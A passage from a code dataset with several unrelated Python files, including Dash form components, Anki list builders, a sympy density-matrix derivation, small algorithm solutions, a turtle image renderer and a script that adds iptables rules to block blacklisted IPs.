item_list)\n\n\nmain()\n","repo_name":"Vernoxvernax/Puddler","sub_path":"puddler/puddler.py","file_name":"puddler.py","file_ext":"py","file_size_in_byte":11887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12932197300","text":"import dash_bootstrap_components as dbc\nfrom dash import dcc, html\n\nfrom constants.enums import OptimizationState\n\n\ndef labelled_dropdown(\n label: str,\n input_id: str,\n options: list,\n value: str,\n disabled: bool = False,\n store_id: str = None,\n) -> dbc.Container:\n return dbc.Container(\n [\n dbc.Label(label),\n dcc.Dropdown(\n id=input_id,\n options=options,\n value=value,\n searchable=True,\n clearable=False,\n disabled=disabled,\n ),\n dcc.Store(id=store_id) if store_id else None,\n ],\n fluid=True,\n style={\"marginLeft\": \"-1vh\", \"width\": \"105%\"},\n )\n\n\ndef labelled_input(\n label: str,\n input_id: str,\n initial_value: int,\n placeholder: str = None,\n input_type: str = \"number\",\n) -> dbc.FormFloating:\n return dbc.FormFloating(\n [\n dbc.Input(\n id=input_id,\n type=input_type,\n value=initial_value,\n placeholder=placeholder,\n ),\n dbc.Label(label),\n ]\n )\n\n\ndef horizontal_line():\n return html.Hr(\n style={\"borderTop\": \"0.1vh solid #888\", \"width\": \"90%\", \"margin\": \"4vh auto\"}\n )\n\n\ndef labelled_input_group(\n symbol: list,\n description: str,\n input_id: str,\n initial_value: str,\n unit: str = None,\n type: str = \"number\",\n disabled=False,\n) -> dbc.InputGroup:\n return dbc.InputGroup(\n [\n dbc.InputGroupText(symbol),\n dbc.FormFloating(\n [\n dbc.Input(\n id=input_id,\n type=type,\n value=initial_value,\n disabled=disabled,\n ),\n dbc.Label(description),\n ]\n ),\n dbc.InputGroupText(unit) if unit else None,\n ],\n className=\"mb-3\",\n )\n\n\ndef labelled_select_group(\n description: str,\n input_id: str,\n options: list,\n value: str,\n disabled=False,\n):\n return dbc.InputGroup(\n [\n dbc.InputGroupText(description),\n dbc.Select(\n id=input_id,\n options=options,\n value=value,\n disabled=disabled,\n ),\n ],\n className=\"mb-3\",\n )\n\n\ndef labelled_optimizable_number_input(\n title: str,\n radio_id: str,\n radio_value: OptimizationState,\n fix_collapse_id: str,\n fix_input_id: str,\n fix_input_value: float,\n constrain_collapse_id: str,\n constrain_min_id: str,\n constrain_min_value: float,\n constrain_max_id: str,\n constrain_max_value: float,\n) -> dbc.Container:\n return 
dbc.Container(\n [\n dbc.Row(\n [\n dbc.Col(dbc.Label(title), width=2),\n dbc.Col(\n optimization_radio(radio_id, radio_value),\n width=6,\n ),\n dbc.Col(\n [\n collapse_input(\n fix_input_id, fix_input_value, fix_collapse_id\n ),\n collapse_double_input(\n constrain_collapse_id,\n constrain_min_id,\n constrain_min_value,\n constrain_max_id,\n constrain_max_value,\n ),\n ],\n width=3,\n ),\n ],\n justify=\"around\",\n align=\"center\",\n ),\n ],\n fluid=True,\n )\n\n\ndef optimization_radio(idx: str, state: OptimizationState) -> html.Div:\n return html.Div(\n dbc.RadioItems(\n id=idx,\n className=\"btn-group\",\n inputClassName=\"btn-check\",\n labelClassName=\"btn btn-outline-primary\",\n labelCheckedClassName=\"active\",\n options=[\n {\"label\": state.name, \"value\": state.value}\n for state in OptimizationState\n ],\n value=state.value,\n ),\n className=\"radio-group\",\n )\n\n\ndef collapse_input(input_id: str, input_value: float, collapse_id: str) -> dbc.Collapse:\n return dbc.Collapse(\n dbc.Input(\n id=input_id,\n type=\"number\",\n value=input_value,\n ),\n collapse_id,\n )\n\n\ndef collapse_double_input(\n collapse_id: str,\n input1_id: str,\n input1_value: float,\n input2_id: str,\n input2_value: float,\n) -> dbc.Collapse:\n return dbc.Collapse(\n [\n dbc.Row(\n [\n dbc.Col(\n dbc.Input(\n id=input1_id,\n type=\"number\",\n value=input1_value,\n placeholder=\"Minimum\",\n ),\n width=6,\n ),\n dbc.Col(\n dbc.Input(\n id=input2_id,\n type=\"number\",\n value=input2_value,\n placeholder=\"Maximum\",\n step=\"any\",\n ),\n width=6,\n ),\n ]\n ),\n ],\n collapse_id,\n )\n","repo_name":"TimWalter/solar-power-estimator","sub_path":"src/dashboard/components.py","file_name":"components.py","file_ext":"py","file_size_in_byte":5644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22822200009","text":"# def make_pure_word_list(word_set):\n# cigencizhui_root = Cigencizhui_Root()\n# with open('pure_word_list.txt', 'w', encoding='utf-8') as f:\n# ordered_input_word_list = cigencizhui_root.put_word_list_in_order(word_set)\n# for word in ordered_input_word_list:\n# print(word)\n# f.write(word)\n# f.write('\\n')\n\n\ndef make_anki_word_image_list(word_set):\n with open('./output/anki_word_image_list.txt', 'w', encoding='utf-8') as f:\n final_word_list = word_set\n print('ordered_input_word_list: ', len(final_word_list))\n for word in final_word_list:\n word = word.strip()\n line = word\n for i in range(1, 11):\n line += \"\\\\\".format(\"word_\" + word + str(i))\n f.write(line)\n f.write('\\n')\n\n\ndef make_gre_synonym_image_list(word_set):\n with open(word_set, 'r', encoding='utf-8') as f:\n word_list = f.read().splitlines()\n\n with open('./output/GRE_anki_same.txt', 'w', encoding='utf-8') as f:\n for word in word_list:\n word = word.strip()\n if len(word) == 0:\n continue\n print(word)\n if '\\u4e00' <= word[0] <= '\\u9fff':\n now_class = word\n else:\n line = word\n for i in range(1, 11):\n line += \"\\\\\".format(word + str(i))\n line += \"\\\\\" + now_class\n f.write(line)\n f.write('\\n')\n\n\ndef make_anki_delete_list(word_set):\n with open('./output/anki_delete_list.txt', 'w', encoding='utf-8') as f:\n for word in word_set:\n word = word.strip()\n line = word\n line += '\\\\_____'\n f.write(line)\n f.write('\\n')\n\n\nif __name__ == '__main__':\n input_txt = \"./word_list_txt/TOEFL_红宝书.txt\"\n\n word_set = set()\n with open(input_txt, 'r', encoding='utf-8') as f:\n for line in f:\n word = line.strip()\n 
word_set.add(word)\n\n make_anki_word_image_list(word_set)\n","repo_name":"Ryanshuai/Make_Anki_List","sub_path":"06_make_anki_list.py","file_name":"06_make_anki_list.py","file_ext":"py","file_size_in_byte":2119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15344836776","text":"import collections\nimport math\n\nfrom sympy.physics.secondquant import F, Fd, Commutator, evaluate_deltas\nfrom sympy import symbols, Dummy, Rational\n\nfrom helper_functions import eval_equation, beautify_equation\nfrom cluster_operators import (\n get_t_1_operator,\n get_t_2_operator,\n get_l_1_operator,\n get_l_2_operator,\n get_clusters,\n)\n\nsymbol_list = [\n (\"rho^{b}_{a} = \", symbols(\"a, b\", above_fermi=True, cls=Dummy)),\n (\n \"rho^{i}_{a} = \",\n (\n symbols(\"a\", above_fermi=True, cls=Dummy),\n symbols(\"i\", below_fermi=True, cls=Dummy),\n ),\n ),\n (\n \"rho^{a}_{i} = \",\n (\n symbols(\"i\", below_fermi=True, cls=Dummy),\n symbols(\"a\", above_fermi=True, cls=Dummy),\n ),\n ),\n (\"rho^{j}_{i} = \", symbols(\"i, j\", below_fermi=True, cls=Dummy)),\n]\n\n\ndef get_one_body_density_operator(p, q):\n return Fd(p) * F(q)\n\n\ndef get_one_body_density_matrix(\n cc_t_functions, cc_l_functions, num_commutators, p=None, q=None\n):\n if p is None:\n p = symbols(\"p\", cls=Dummy)\n\n if q is None:\n q = symbols(\"q\", cls=Dummy)\n\n c_pq = get_one_body_density_operator(p, q)\n\n if not isinstance(cc_t_functions, collections.Iterable):\n cc_t_functions = [cc_t_functions]\n\n if not isinstance(cc_l_functions, collections.Iterable):\n cc_l_functions = [cc_l_functions]\n\n T = get_clusters(cc_t_functions)\n L = get_clusters(cc_l_functions)\n\n rho_eq = eval_equation(c_pq)\n rho_eq += eval_equation(Commutator(c_pq, T))\n rho_eq += eval_equation(L * c_pq)\n\n comm = c_pq\n\n for i in range(1, num_commutators + 1):\n comm = Commutator(comm, get_clusters(cc_t_functions))\n rho_eq += Rational(1, int(math.factorial(i))) * eval_equation(L * comm)\n\n rho = beautify_equation(rho_eq)\n\n return rho\n\n\ndef get_ccs_one_body_density_matrix(p=None, q=None):\n return get_one_body_density_matrix(\n get_t_1_operator, get_l_1_operator, 1, p=p, q=q\n )\n\n\ndef get_ccd_one_body_density_matrix(p=None, q=None):\n rho = get_one_body_density_matrix(\n get_t_2_operator, get_l_2_operator, 1, p=p, q=q\n )\n\n return rho\n\n\ndef get_ccsd_one_body_density_matrix(p=None, q=None):\n rho = get_one_body_density_matrix(\n [get_t_1_operator, get_t_2_operator],\n [get_l_1_operator, get_l_2_operator],\n 2,\n p=p,\n q=q,\n )\n\n return rho\n\n\nif __name__ == \"__main__\":\n from sympy import latex\n\n p = symbols(\"p\", above_fermi=True, cls=Dummy)\n q = symbols(\"q\", above_fermi=True, cls=Dummy)\n p = q = None\n\n print(\"CCS:\", latex(get_ccs_one_body_density_matrix(p=p, q=q)))\n print(\"CCD:\", latex(get_ccd_one_body_density_matrix(p=p, q=q)))\n print(\"CCSD:\", latex(get_ccsd_one_body_density_matrix(p=p, q=q)))\n","repo_name":"HyQD/coupled-cluster","sub_path":"symbolic-expressions/one_body_density_matrix.py","file_name":"one_body_density_matrix.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"25637548810","text":"class Solution(object):\n def onesMinusZeros(self, grid):\n trans = list(list(x) for x in zip(*grid))\n row = []\n col = []\n for i in grid:\n s = sum(i)\n s -= len(grid[0]) - s\n row.append(s)\n for j in trans:\n s = sum(j)\n s -= len(trans[0]) - s\n 
col.append(s)\n print(row,col)\n ans = [[0 for _ in range(len(grid[0]))] for _ in range(len(grid)) ]\n for i in range(len(row)):\n for j in range(len(col)):\n ans[i][j] = row[i] + col[j]\n \n return ans\n \n \n ","repo_name":"natiyeshi/A2SVproblems","sub_path":"2482-difference-between-ones-and-zeros-in-row-and-column/2482-difference-between-ones-and-zeros-in-row-and-column.py","file_name":"2482-difference-between-ones-and-zeros-in-row-and-column.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33929686229","text":"from typing import List\n\n\nclass Solution:\n def transfor(self, string: str) -> str:\n str_list = string.split(\" \")\n num_str = list()\n operator_str = list()\n for i in str_list:\n if i.isdigit() or i[0] == '-':\n num_str.append(i)\n else:\n operator_str.append(i)\n\n print(num_str)\n print(operator_str)\n\n length = len(operator_str)\n if length == 1:\n s = \" \" + operator_str[0] + \" \"\n return s.join(sorted(num_str))\n\n t = operator_str[0]\n pos = 0\n ret = \"\"\n for i in range(1, length):\n if (t != operator_str[i]) or (i == length - 1):\n splt = \" \" + t + \" \"\n\n ret = ret + splt.join(sorted(num_str[pos:i])) + splt\n print(ret)\n t = operator_str[i]\n print(\"t:%s\" % t)\n pos = i\n ret = ret + num_str[-1]\n return ret\n\nif __name__ == \"__main__\":\n string = input().strip()\n s = Solution()\n ret = s.transfor(string)\n print(ret)","repo_name":"Lcoderfit/Introduction-to-algotithms","sub_path":"二、招聘笔试题/2019秋招笔试/1.滴滴转换算式.py","file_name":"1.滴滴转换算式.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"7354912614","text":"from PIL import Image\nimport turtle as t\n# Set the image name and path\nimage_name = 'bgrd.gif'\nprecision = 1 # 1 = all pixels, 2 = every two pixel, 3 = every third pixel, etc.\nassert precision > 0, 'precision must be > 0'\nassert type(precision) == int, 'precision must be an integer'\n\n# Open the image\nim = Image.open(image_name)\nprint(f'importing {image_name} ({im.format} image) of size {im.size}')\nim_lraw = list(im.getdata())\nim_list = [im_lraw[i:i+im.size[0]:precision] for i in range(0,im.size[0]*im.size[1],im.size[0])][::precision]\nprint(f'imported {im.size[0]*im.size[1]//precision} pixels',f'over {im.size[0]*im.size[1]} pixels' if precision > 1 else '')\nim_palette = im.getpalette()\nim_colors = [tuple(im_palette[i:i+3]) for i in range(0,len(im_palette),3)]\nprint(f'found {len(im_colors)} colors in the image')\nbgcolor = im_colors[0] # background color, first color in the list == most common color\nprint(f'background color is {bgcolor}')\n#im = None # free memory (not really necessary)\nprint('generating turtle code (this may take a while)...')\nim_list_text = 'bgrd_list=['+','.join(['['+','.join(map(str,im_list[i]))+']' for i in range(len(im_list))])+']'\nim_colors_text = 'bgrd_colors=['+','.join(['('+','.join(map(str,im_colors[i]))+')' for i in range(len(im_colors))])+']'\nim_text = im_list_text+'\\n'+im_colors_text\n\nbg = t.Turtle()\nt.setup(im.size[0],im.size[1])\nt.colormode(255)\nt.tracer(0)\nbg.hideturtle()\n# Set the background color\nbg.color(bgcolor)\nbg.goto(-im.size[0]//2,-im.size[1]//2)\nbg.down()\nbg.begin_fill()\nbg.forward(im.size[0])\nbg.left(90)\nbg.forward(im.size[1])\nbg.left(90)\nbg.forward(im.size[0])\nbg.left(90)\nbg.forward(im.size[1])\nbg.left(90)\nbg.end_fill()\nbg.up()\n# Draw the image\nbt = 
t.Turtle()\nbt.hideturtle()\nbt.up()\nbt.goto(-im.size[0]//2,im.size[1]//2)\nt.update()\nfor i in range(len(im_list)):\n for j in range(len(im_list[i])):\n c = im_colors[im_list[i][j]]\n if c:\n bt.down()\n bt.color(c)\n bt.forward(1)\n bt.up()\n else:\n bt.goto(bt.xcor()+1,bt.ycor())\n bt.up()\n bt.goto(-im.size[0]//2,im.size[1]//2-i-1)\n t.update()\nt.exitonclick()\n","repo_name":"Loic-An/allumettes","sub_path":"old/imgtoturtle.py","file_name":"imgtoturtle.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29938578867","text":"\ndef license_plate(s, n):\n chars = [char for char in s.upper() if char != '-']\n m = len(chars)\n r = m%n\n \n pieces = ([chars[:r]] if r else []) + [chars[i:i+n] for i in range(r,m,n)]\n \n return '-'.join([''.join(piece) for piece in pieces])\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"HTaZiWnsCGgehpgdr_18.py","file_name":"HTaZiWnsCGgehpgdr_18.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25490763573","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Source: https://leetcode.com/problems/minimum-falling-path-sum/\n# Author: Miao Zhang\n# Date: 2021-03-26\n\nclass Solution:\n def minFallingPathSum(self, matrix: List[List[int]]) -> int:\n while len(matrix) >= 2:\n row = matrix.pop()\n for j in range(len(row)):\n matrix[-1][j] += min(row[max(0, j - 1): min(len(row), j + 2)])\n return min(matrix[0])\n","repo_name":"MichelleZ/leetcode","sub_path":"algorithms/python/minimumFallingPathSum/minimumFallingPathSum.py","file_name":"minimumFallingPathSum.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"39919616916","text":"# Написать функцию balanced_num, которая определяет является ли заданное число сбалансированным, т.е.\n# сумма цифр справа и слева от середины равны (abcde ==> a + b == d + e; abcdef ==> a + b == e + f)\n#\n# Примеры:\n# balanced_num(2222) ==> True\n# balanced_num(135622) ==> True\n\nimport traceback\n\n\ndef balanced_num(number):\n number_str = str(number) # Преобразовываем число в строку\n if len(number_str) <= 1: # Если длина 1, то сразу возращаем true\n return True\n else:\n middle = len(number_str) // 2 # Ищём середину\n\n # У нас в любом случае массивы разделятся на равные, если количество элементов\n # было не чётное, то средний элемент просто не будет учитываться\n a1 = number_str[:middle] # От начала до середины\n if len(number_str) % 2 == 1: # Если число чётное, то используем все элементы, если нет, игнорируем центральный\n a2 = number_str[(middle + 1):] # Не учитываем центральный элемент\n else:\n a2 = number_str[middle:] # Учитываем все\n sum1 = 0\n sum2 = 0\n for i in range(len(a1)):\n sum1 += int(a1[i])\n sum2 += int(a2[i])\n if sum1 == sum2:\n return True\n else:\n return False\n\n\n# Тесты\ntry:\n assert balanced_num(13) == False\n assert balanced_num(0) == True\n assert balanced_num(295591) == False\n assert balanced_num(56239814) == False\n assert balanced_num(1230987) == False\nexcept AssertionError:\n print(\"TEST ERROR\")\n traceback.print_exc()\nelse:\n print(\"TEST 
PASSED\")\n","repo_name":"MBC-Studio/Introductory_practice_A_04XTodO70bzRjdO006k","sub_path":"task_A101.py","file_name":"task_A101.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36022406701","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Apr 13 13:32:54 2020\r\n\r\n@author: Ravi\r\n\"\"\"\r\n\r\ndef cout(arr,k,n):\r\n e = 100\r\n current = 0\r\n tempCurrent = None\r\n while(tempCurrent!=0):\r\n i = arr[(current+k)%n]\r\n if i==0:\r\n e = e-1\r\n else:\r\n e = e-3\r\n tempCurrent = (current+k)%n\r\n current+=k\r\n print(e)\r\nn,k = map(int,input().split())\r\narr = list(map(int,input().split()))\r\ncout(arr,k,n)","repo_name":"RaviPabari/HackerRank-Problems","sub_path":"Jumping Clouds Revisited.py","file_name":"Jumping Clouds Revisited.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"32"} +{"seq_id":"5602945199","text":"C = int(input())\ncase_num = 0\nwhile True:\n N_li = list(map(int, input().split(' ')))\n N = N_li[0]\n average = (sum(N_li)-N) / N\n student_num = []\n for i in range(1, N+1):\n if N_li[i] > average:\n student_num.append(N_li[i])\n ratio = 100*(len(student_num) / N)\n print(format(ratio, \".3f\"), \"%\", sep='')\n case_num += 1\n if case_num >= C:\n break","repo_name":"minjoo999/Algorithm","sub_path":"백준/Bronze/4344. 평균은 넘겠지/평균은 넘겠지.py","file_name":"평균은 넘겠지.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11522273969","text":"from itertools import product\n\nimport numpy as np\nimport pandas as pd\nimport pytest\nfrom pandas.testing import assert_index_equal\n\n\n@pytest.mark.parametrize(\"problem_type\", [\"binary\", \"multi\"])\ndef test_new_unique_targets_in_score(\n X_y_binary,\n logistic_regression_binary_pipeline,\n X_y_multi,\n logistic_regression_multiclass_pipeline,\n problem_type,\n):\n if problem_type == \"binary\":\n X, y = X_y_binary\n pipeline = logistic_regression_binary_pipeline\n objective = \"Log Loss Binary\"\n elif problem_type == \"multi\":\n X, y = X_y_multi\n pipeline = logistic_regression_multiclass_pipeline\n objective = \"Log Loss Multiclass\"\n pipeline.fit(X, y)\n with pytest.raises(ValueError, match=\"y contains previously unseen labels\"):\n pipeline.score(X, pd.Series([4] * len(y)), [objective])\n\n\n@pytest.mark.parametrize(\"num_unique\", [1, 2, 3])\n@pytest.mark.parametrize(\"pipeline\", [\"binary\", \"multiclass\"])\ndef test_invalid_targets_classification_pipeline(\n num_unique,\n pipeline,\n dummy_binary_pipeline,\n dummy_multiclass_pipeline,\n):\n X = pd.DataFrame([i for i in range(30)])\n\n if num_unique == 1:\n y = pd.Series([1 for i in range(30)])\n elif num_unique == 2:\n y = pd.Series([i % 2 for i in range(30)])\n elif num_unique == 3:\n y = pd.Series([i % 3 for i in range(30)])\n\n if pipeline == \"binary\":\n mock_binary_pipeline = dummy_binary_pipeline\n if num_unique in [1, 3]:\n with pytest.raises(\n ValueError,\n match=\"Binary pipelines require y to have 2 unique classes!\",\n ):\n mock_binary_pipeline.fit(X, y)\n else:\n assert mock_binary_pipeline.fit(X, y)\n elif pipeline == \"multiclass\":\n mock_multi_pipeline = dummy_multiclass_pipeline\n if num_unique in [1, 2]:\n with pytest.raises(\n ValueError,\n match=\"Multiclass pipelines require y to have 3 or more unique classes!\",\n ):\n mock_multi_pipeline.fit(X, 
y)\n else:\n assert mock_multi_pipeline.fit(X, y)\n\n\n@pytest.mark.parametrize(\n \"problem_type,use_ints\",\n product([\"binary\", \"multi\"], [True, False]),\n)\ndef test_pipeline_has_classes_property(\n breast_cancer_local,\n wine_local,\n logistic_regression_binary_pipeline,\n logistic_regression_multiclass_pipeline,\n problem_type,\n use_ints,\n):\n if problem_type == \"binary\":\n X, y = breast_cancer_local\n pipeline = logistic_regression_binary_pipeline\n if use_ints:\n y = y.map({\"malignant\": 0, \"benign\": 1})\n answer = [0, 1]\n else:\n answer = [\"benign\", \"malignant\"]\n elif problem_type == \"multi\":\n X, y = wine_local\n pipeline = logistic_regression_multiclass_pipeline\n if use_ints:\n y = y.map({\"class_0\": 0, \"class_1\": 1, \"class_2\": 2})\n answer = [0, 1, 2]\n else:\n answer = [\"class_0\", \"class_1\", \"class_2\"]\n\n # Check that .classes_ is None before fitting\n assert pipeline.classes_ is None\n\n pipeline.fit(X, y)\n assert pipeline.classes_ == answer\n\n\ndef test_woodwork_classification_pipeline(\n breast_cancer_local,\n logistic_regression_binary_pipeline,\n):\n X, y = breast_cancer_local\n mock_pipeline = logistic_regression_binary_pipeline\n mock_pipeline.fit(X, y)\n assert not pd.isnull(mock_pipeline.predict(X)).any()\n assert not pd.isnull(mock_pipeline.predict_proba(X)).any().any()\n\n\n@pytest.mark.parametrize(\n \"index\",\n [\n list(range(-5, 0)),\n list(range(100, 105)),\n [f\"row_{i}\" for i in range(5)],\n pd.date_range(\"2020-09-08\", periods=5),\n ],\n)\n@pytest.mark.parametrize(\"problem_type\", [\"binary\", \"multi\"])\ndef test_pipeline_transform_and_predict_with_custom_index(\n index,\n problem_type,\n logistic_regression_binary_pipeline,\n logistic_regression_multiclass_pipeline,\n):\n X = pd.DataFrame(\n {\"categories\": [f\"cat_{i}\" for i in range(5)], \"numbers\": np.arange(5)},\n index=index,\n )\n X.ww.init(logical_types={\"categories\": \"categorical\"})\n\n if problem_type == \"binary\":\n y = pd.Series([0, 1, 1, 1, 0], index=index)\n pipeline = logistic_regression_binary_pipeline\n elif problem_type == \"multi\":\n y = pd.Series([0, 1, 2, 1, 0], index=index)\n pipeline = logistic_regression_multiclass_pipeline\n pipeline.fit(X, y)\n\n predictions = pipeline.predict(X)\n predict_proba = pipeline.predict_proba(X)\n\n assert_index_equal(predictions.index, X.index)\n assert_index_equal(predict_proba.index, X.index)\n","repo_name":"alteryx/evalml","sub_path":"evalml/tests/pipeline_tests/classification_pipeline_tests/test_classification.py","file_name":"test_classification.py","file_ext":"py","file_size_in_byte":4688,"program_lang":"python","lang":"en","doc_type":"code","stars":664,"dataset":"github-code","pt":"32"} +{"seq_id":"2879855508","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__version__ = \"$Revision$\"\n\nimport __builtin__\nimport gettext\nimport os\nimport sys\n\ngettext.install('yaplcide') # this is a dummy to prevent gettext falling down\n\n_dist_folder = os.path.split(sys.path[0])[0]\n_beremiz_folder = os.path.join(_dist_folder, \"beremiz\")\n#Ensure that Beremiz things are imported before builtins and libs.\nsys.path.insert(1,_beremiz_folder)\n\nfrom Beremiz import *\n\nclass YAPLCIdeLauncher(BeremizIDELauncher):\n \"\"\"\n YAPLC IDE Launcher class\n \"\"\"\n def __init__(self):\n BeremizIDELauncher.__init__(self)\n self.yaplc_dir = os.path.dirname(os.path.realpath(__file__))\n self.splashPath = self.YApath(\"images\", \"splash.png\")\n self.extensions.append(self.YApath(\"yaplcext.py\"))\n\n import 
features\n # Let's import nucleron yaplcconnectors\n import yaplcconnectors\n import connectors\n\n connectors.connectors.update(yaplcconnectors.connectors)\n\n # Import Nucleron yaplctargets\n import yaplctargets\n import targets\n\n targets.toolchains.update(yaplctargets.toolchains)\n targets.targets.update(yaplctargets.yaplctargets)\n\n features.libraries = [\n\t ('Native', 'NativeLib.NativeLibrary')]\n \n features.catalog.append(('yaplcconfig',\n _('YAPLC Configuration Node'),\n _('Adds template located variables'),\n 'yaplcconfig.yaplcconfig.YAPLCNodeConfig'))\n\n def YApath(self, *args):\n return os.path.join(self.yaplc_dir, *args)\n\n\n# This is where we start our application\nif __name__ == '__main__':\n beremiz = YAPLCIdeLauncher()\n beremiz.Start()\n","repo_name":"nucleron/IDE","sub_path":"yaplcide.py","file_name":"yaplcide.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"32"} +{"seq_id":"25656332897","text":"\"\"\"\nThis module adds the IPs in the Blacklisted_IP from data folder and exclude the whitelisted_ips into the firewall\n\"\"\"\n\nimport csv\nimport os\nimport platform\nimport signal\nimport json\nimport time\nimport subprocess\nimport re\nfrom tqdm import tqdm\nimport signal\nimport sys\n\nSOFTWARE_DIR=os.getcwd()\nCONFIG=\"configurations/firewall_updater_config.json\"\nCHAIN_NAME=\"BLOCK_IPS_IP_Protect\"\n\ndef signal_handler(sig, frame):\n \"\"\"\"Signal handler for SIGINT\"\"\"\n print(\"\\n\\n\\033[1mProcess interrupted by user\\033[0m\")\n sys.exit(0)\n\ndef block_ip_firewall():\n \"\"\"Block the IPs in the firewall using Blacklisted_IP.csv\"\"\"\n\n print(\"\\033[1mPlease enter the password for sudo if prompted, (enter within 30 seconds)\\033[0m\")\n if os.system(\"sudo -v\") != 0:\n # set a 30-second timeout to wait for user input\n def handler(signum, frame):\n raise Exception(\"30 seconds elapsed, password not entered\")\n \n signal.signal(signal.SIGALRM, handler)\n signal.alarm(30)\n \n try:\n # Ask for sudo password\n os.system(\"sudo -v\")\n \n # Reset the alarm\n signal.alarm(0)\n except Exception as e:\n print(str(e))\n return\n if os.system(\"sudo -v\") != 0:\n print(\"Run the script with sudo privileges\")\n exit()\n print(\"Updating firewall rules with the latest IPs to be blocked...\")\n\n # Specify the folder to the CSV files containing the IPs to be blocked\n csvs_folders=os.path.join(os.getcwd(),'data')\n\n # Join all the CSV files in the folder into a single CSV file (removing the header row from all thefiles except the first one)\n FOLDERS_CSVS_TO_BE_NOT_ADDED=[]\n with open (CONFIG, 'r') as f:\n data = json.load(f)\n stack = [data]\n while stack:\n current = stack.pop()\n if isinstance(current, dict):\n for key, value in current.items():\n if isinstance(value, bool) and value is False:\n FOLDERS_CSVS_TO_BE_NOT_ADDED.append(key)\n elif isinstance(value, dict):\n stack.append(value)\n\n IP_to_be_blocked = []\n for root, dirs, files in os.walk(csvs_folders):\n if 'whitelisted_ip' in dirs:\n dirs.remove('whitelisted_ip') # Exclude the \"whitelisted_ip\" directory from further traversal\n for dir in FOLDERS_CSVS_TO_BE_NOT_ADDED:\n if dir in dirs:\n dirs.remove(dir)\n for file in files:\n if file.endswith('.csv'):\n with open(os.path.join(root, file), 'r') as infile:\n reader = csv.reader(infile)\n rows = [row for row in reader] # Read all rows of the CSV\n if len(rows) > 1:\n IP_to_be_blocked += [row[0] for row in rows[1:]] # Skip the first row\n\n #whitelisted 
IPs\n whitelisted_ip=[]\n with open(os.path.join(SOFTWARE_DIR,'data','whitelisted_ip','whitelist.csv'), 'r') as infile:\n reader = csv.reader(infile)\n rows=[row for row in reader] #Read all rows of the CSV \n if len(rows)>1:\n whitelisted_ip+=[row[0] for row in rows[1:]] #Skip the first row\n\n #excluding whitelist IPs from IP_to_be_blocked\n IP_to_be_blocked = [ip for ip in IP_to_be_blocked if ip not in whitelisted_ip]\n print(\"Total IPs to be added to firewall: \", len(IP_to_be_blocked))\n\n # The name of the firewall chain to add the rules to\n chain_name = CHAIN_NAME\n\n # check if the chain not already exists\n current_platform = platform.system()\n chain_name_present = False\n\n if current_platform == 'Linux':\n # Get all the chain names using the iptables command and regex\n command = \"sudo iptables -L -n\"\n output = subprocess.check_output(command, shell=True).decode('utf-8')\n chain_names = re.findall(r\"Chain\\s(\\w+)\", output)\n\n # Check if the chain already exists in the list of chain names\n if chain_name in chain_names:\n chain_name_present = True\n else:\n # If the chain name does not exist, create it\n command = f'sudo iptables -N {chain_name}'\n subprocess.call(command, shell=True)\n print(f\"Firewall RuleChain-, Chain '{chain_name}' created successfully.\")\n \n # Set the signal handler for SIGINT\n signal.signal(signal.SIGINT, signal_handler)\n\n print(f\"Adding rules to firewall chain '{chain_name}'...\")\n # Your existing code\n print(\"\\033[1mPlease ignore legacy host/network error, if any\\033[0m\")\n print(\"Total rules to be added: \", len(IP_to_be_blocked))\n ETA=round(len(IP_to_be_blocked)/50)\n print(f\"This will take a while , between {ETA/4} to {ETA} seconds on normal computers\")\n\n ##################[Windows and MacOS support is under development]################\n print(\"\\033[1mPlease see the update progress of adding rules to firewall below\\033[0m\")\n # Loop through the IP addresses and add each one to the firewall chain\n with tqdm(total=len(IP_to_be_blocked)) as pbar:\n for ip_address in IP_to_be_blocked:\n # Block IPs on Linux-based systems using iptables\n if current_platform == 'Linux':\n os.system(f'sudo iptables -A {chain_name} -s {ip_address} -j DROP')\n # # Block IPs on macOS using pfctl\n # elif current_platform == 'Darwin':\n # os.system(f'sudo pfctl -t {chain_name} -T add {ip_address}')\n # # Block IPs on Windows using PowerShell\n # elif current_platform == 'Windows':\n # os.system(f'powershell.exe New-NetFirewallRule -DisplayName \"Block {ip_address}\" -Direction Inbound -LocalAddress Any -RemoteAddress {ip_address} -Action Block')\n else:\n print(f'Error: Platform \"{current_platform}\" not supported')\n sys.exit(1)\n pbar.update(1)\n print(\"\\033[1mFirewall rules added successfully, please ignore legacy host/network error, if any\\033[0m\")\n\n\ndef unblock_ip_firewall():\n \"\"\"Remove the IPs in the firewall using Blacklisted_IP.csv(This is done to remove the IPs which were defined by old Blacklisted_IPs)\"\"\"\n\n print(\"\\033[1mPlease enter the password for sudo if prompted, 